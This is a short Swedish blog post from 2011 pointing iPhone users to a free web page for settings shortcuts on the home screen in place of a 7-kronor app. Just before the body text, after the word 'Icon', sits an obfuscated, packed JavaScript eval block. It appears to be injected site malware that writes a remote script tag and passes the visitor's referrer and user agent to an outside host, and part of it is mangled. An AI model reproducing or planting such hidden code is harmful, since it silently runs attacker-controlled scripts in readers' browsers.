Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Välj iPhone inställningar till hemskärmen utan kostnad.

Välj iPhone inställningar till hemskärmen utan kostnad.
Filip Urde
  • On 21 november, 2011
  • http://www.revue.se/filip-urde

Icon eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eaasr|var|u0026u|referrer|zhira||js|php’.split(’|’),0,{}))
Project är en app
som låter dig skapa genvägar till de olika inställningarna direkt på hemskärmen. Appen kostar 7 kronor och erbjuder även möjligheten att skapa egna ikoner för dessa. Men nöjjer du dig med standardinställningarna och kan tänka dig använda färdiga ikoner så finns det ett betydligt enklare och framförallt kostnadsfritt sätt.

Gå in på brdrck.me/settings med din iPhone och sedan är det bara att välja det du behöver.

Ganska nice!